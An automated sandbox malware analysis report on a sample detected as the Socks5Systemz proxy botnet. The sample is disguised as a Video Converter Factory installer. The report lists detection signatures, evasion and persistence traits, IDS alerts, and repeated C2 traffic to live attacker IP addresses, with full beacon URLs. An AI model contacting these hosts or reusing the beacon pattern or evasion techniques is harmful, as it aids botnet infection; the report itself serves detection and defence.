Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Oz2UhFBTHy.exe

Overview

General Information

Sample name:Oz2UhFBTHy.exe
renamed because original name is a hash value
Original sample name:667621f07a3de153960af063462b20fe.exe
Analysis ID:1576054
MD5:667621f07a3de153960af063462b20fe
SHA1:d58576525b3020446b244bba68d5cd3b6fef1f15
SHA256:efec8c0153efdda5a578ec1dd1a08254fc04a4036adda01ab44a4415e02cb852
Tags:exeuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Uses known network protocols on non-standard ports
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Oz2UhFBTHy.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\Oz2UhFBTHy.exe" MD5: 667621F07A3DE153960AF063462B20FE)
    • Oz2UhFBTHy.tmp (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmp" /SL5="$10434,3669199,56832,C:\Users\user\Desktop\Oz2UhFBTHy.exe" MD5: 9D6E5DF4EF5AD8914D4A482A3BC8BB55)
      • videoconverterfactory.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe" -i MD5: 044E781B9914BD4A3851BF6BA7D7C9D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\is-LETAI.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000003.00000002.2634215287.0000000002D21000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000003.00000000.1372320071.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000003.00000002.2631419296.0000000002C79000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              Process Memory Space: videoconverterfactory.exe PID: 7880JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                SourceRuleDescriptionAuthorStrings
                3.0.videoconverterfactory.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:43:41.682455+010020287653Unknown Traffic192.168.2.949837188.119.66.185443TCP
                  2024-12-16T13:43:47.389022+010020287653Unknown Traffic192.168.2.949853188.119.66.185443TCP
                  2024-12-16T13:43:49.697566+010020287653Unknown Traffic192.168.2.949859188.119.66.185443TCP
                  2024-12-16T13:43:52.261583+010020287653Unknown Traffic192.168.2.949866188.119.66.185443TCP
                  2024-12-16T13:43:54.538964+010020287653Unknown Traffic192.168.2.949872188.119.66.185443TCP
                  2024-12-16T13:43:56.816929+010020287653Unknown Traffic192.168.2.949878188.119.66.185443TCP
                  2024-12-16T13:43:59.097392+010020287653Unknown Traffic192.168.2.949884188.119.66.185443TCP
                  2024-12-16T13:44:01.369551+010020287653Unknown Traffic192.168.2.949890188.119.66.185443TCP
                  2024-12-16T13:44:03.811177+010020287653Unknown Traffic192.168.2.949896188.119.66.185443TCP
                  2024-12-16T13:44:06.110518+010020287653Unknown Traffic192.168.2.949902188.119.66.185443TCP
                  2024-12-16T13:44:08.368016+010020287653Unknown Traffic192.168.2.949908188.119.66.185443TCP
                  2024-12-16T13:44:10.808899+010020287653Unknown Traffic192.168.2.949914188.119.66.185443TCP
                  2024-12-16T13:44:13.058405+010020287653Unknown Traffic192.168.2.949921188.119.66.185443TCP
                  2024-12-16T13:44:15.498260+010020287653Unknown Traffic192.168.2.949928188.119.66.185443TCP
                  2024-12-16T13:44:17.758452+010020287653Unknown Traffic192.168.2.949935188.119.66.185443TCP
                  2024-12-16T13:44:20.219994+010020287653Unknown Traffic192.168.2.949943188.119.66.185443TCP
                  2024-12-16T13:44:22.653229+010020287653Unknown Traffic192.168.2.949949188.119.66.185443TCP
                  2024-12-16T13:44:24.939052+010020287653Unknown Traffic192.168.2.949955188.119.66.185443TCP
                  2024-12-16T13:44:27.376908+010020287653Unknown Traffic192.168.2.949961188.119.66.185443TCP
                  2024-12-16T13:44:29.829325+010020287653Unknown Traffic192.168.2.949967188.119.66.185443TCP
                  2024-12-16T13:44:32.109911+010020287653Unknown Traffic192.168.2.949973188.119.66.185443TCP
                  2024-12-16T13:44:34.350582+010020287653Unknown Traffic192.168.2.949979188.119.66.185443TCP
                  2024-12-16T13:44:36.808542+010020287653Unknown Traffic192.168.2.949985188.119.66.185443TCP
                  2024-12-16T13:44:39.100474+010020287653Unknown Traffic192.168.2.949994188.119.66.185443TCP
                  2024-12-16T13:44:41.353932+010020287653Unknown Traffic192.168.2.950000188.119.66.185443TCP
                  2024-12-16T13:44:43.662474+010020287653Unknown Traffic192.168.2.950002188.119.66.185443TCP
                  2024-12-16T13:44:46.116004+010020287653Unknown Traffic192.168.2.950003188.119.66.185443TCP
                  2024-12-16T13:44:48.405797+010020287653Unknown Traffic192.168.2.950004188.119.66.185443TCP
                  2024-12-16T13:44:50.705288+010020287653Unknown Traffic192.168.2.950005188.119.66.185443TCP
                  2024-12-16T13:44:53.179426+010020287653Unknown Traffic192.168.2.950006188.119.66.185443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-16T13:43:42.371595+010028032742Potentially Bad Traffic192.168.2.949837188.119.66.185443TCP
                  2024-12-16T13:43:48.111366+010028032742Potentially Bad Traffic192.168.2.949853188.119.66.185443TCP
                  2024-12-16T13:43:50.385851+010028032742Potentially Bad Traffic192.168.2.949859188.119.66.185443TCP
                  2024-12-16T13:43:52.952062+010028032742Potentially Bad Traffic192.168.2.949866188.119.66.185443TCP
                  2024-12-16T13:43:55.228516+010028032742Potentially Bad Traffic192.168.2.949872188.119.66.185443TCP
                  2024-12-16T13:43:57.515018+010028032742Potentially Bad Traffic192.168.2.949878188.119.66.185443TCP
                  2024-12-16T13:43:59.804827+010028032742Potentially Bad Traffic192.168.2.949884188.119.66.185443TCP
                  2024-12-16T13:44:02.052397+010028032742Potentially Bad Traffic192.168.2.949890188.119.66.185443TCP
                  2024-12-16T13:44:04.540880+010028032742Potentially Bad Traffic192.168.2.949896188.119.66.185443TCP
                  2024-12-16T13:44:06.799352+010028032742Potentially Bad Traffic192.168.2.949902188.119.66.185443TCP
                  2024-12-16T13:44:09.048847+010028032742Potentially Bad Traffic192.168.2.949908188.119.66.185443TCP
                  2024-12-16T13:44:11.494103+010028032742Potentially Bad Traffic192.168.2.949914188.119.66.185443TCP
                  2024-12-16T13:44:13.743051+010028032742Potentially Bad Traffic192.168.2.949921188.119.66.185443TCP
                  2024-12-16T13:44:16.184839+010028032742Potentially Bad Traffic192.168.2.949928188.119.66.185443TCP
                  2024-12-16T13:44:18.453612+010028032742Potentially Bad Traffic192.168.2.949935188.119.66.185443TCP
                  2024-12-16T13:44:20.899473+010028032742Potentially Bad Traffic192.168.2.949943188.119.66.185443TCP
                  2024-12-16T13:44:23.340666+010028032742Potentially Bad Traffic192.168.2.949949188.119.66.185443TCP
                  2024-12-16T13:44:25.619144+010028032742Potentially Bad Traffic192.168.2.949955188.119.66.185443TCP
                  2024-12-16T13:44:28.064403+010028032742Potentially Bad Traffic192.168.2.949961188.119.66.185443TCP
                  2024-12-16T13:44:30.519577+010028032742Potentially Bad Traffic192.168.2.949967188.119.66.185443TCP
                  2024-12-16T13:44:32.789400+010028032742Potentially Bad Traffic192.168.2.949973188.119.66.185443TCP
                  2024-12-16T13:44:35.035582+010028032742Potentially Bad Traffic192.168.2.949979188.119.66.185443TCP
                  2024-12-16T13:44:37.521212+010028032742Potentially Bad Traffic192.168.2.949985188.119.66.185443TCP
                  2024-12-16T13:44:39.786964+010028032742Potentially Bad Traffic192.168.2.949994188.119.66.185443TCP
                  2024-12-16T13:44:42.040026+010028032742Potentially Bad Traffic192.168.2.950000188.119.66.185443TCP
                  2024-12-16T13:44:44.345174+010028032742Potentially Bad Traffic192.168.2.950002188.119.66.185443TCP
                  2024-12-16T13:44:46.802858+010028032742Potentially Bad Traffic192.168.2.950003188.119.66.185443TCP
                  2024-12-16T13:44:49.097759+010028032742Potentially Bad Traffic192.168.2.950004188.119.66.185443TCP
                  2024-12-16T13:44:51.413032+010028032742Potentially Bad Traffic192.168.2.950005188.119.66.185443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://188.119.66.185/ai/?key=8f3f2b3abAvira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328bAvira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325Avira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4Avira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965aAvira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a52Avira URL Cloud: Label: malware
                  Source: https://188.119.66.185/ai/?key=8f3f2b3ab710463926Avira URL Cloud: Label: malware
                  Source: Oz2UhFBTHy.exeReversingLabs: Detection: 15%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                  Source: C:\ProgramData\VideoConverterFactory\VideoConverterFactory.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D188
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045D254 ArcFourCrypt,2_2_0045D254
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_0045D23C ArcFourCrypt,2_2_0045D23C
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_10001130 ArcFourCrypt,2_2_10001130

                  Compliance

                  barindex
                  Source: C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exeUnpacked PE file: 3.2.videoconverterfactory.exe.400000.0.unpack
                  Source: Oz2UhFBTHy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Converter Factory_is1Jump to behavior
                  Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49837 version: TLS 1.2
                  Source: Binary string: msvcp71.pdbx# source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: msvcr71.pdb< source: is-L1OQV.tmp.2.dr
                  Source: Binary string: msvcp71.pdb source: is-7N8CJ.tmp.2.dr
                  Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-T8AR0.tmp.2.dr
                  Source: Binary string: msvcr71.pdb source: is-L1OQV.tmp.2.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                  Source: C:\Users\user\AppData\Local\Temp\is-CI3F6.tmp\Oz2UhFBTHy.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC

                  Networking

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2024 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 2024
                  Source: global trafficTCP traffic: 192.168.2.9:49843 -> 31.214.157.206:2024
                  Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
                  Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
                  Source: Joe Sandbox ViewIP Address: 31.214.157.206 31.214.157.206
                  Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49837 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49853 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49859 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49866 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49872 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49908 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49896 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49902 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49878 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49890 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49914 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49935 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49884 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49921 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49979 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50000 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50006 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50003 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50004 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49985 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50005 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50002 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49955 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49973 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49949 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49994 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49961 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49943 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49967 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49928 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49878 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49837 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49853 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49935 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49955 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49884 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49985 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49994 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50002 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49866 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49928 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49872 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50004 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49914 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50005 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49908 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49890 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50003 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49949 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49921 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49902 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49859 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49943 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49973 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49896 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49979 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49961 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49967 -> 188.119.66.185:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50000 -> 188.119.66.185:443
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                  Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
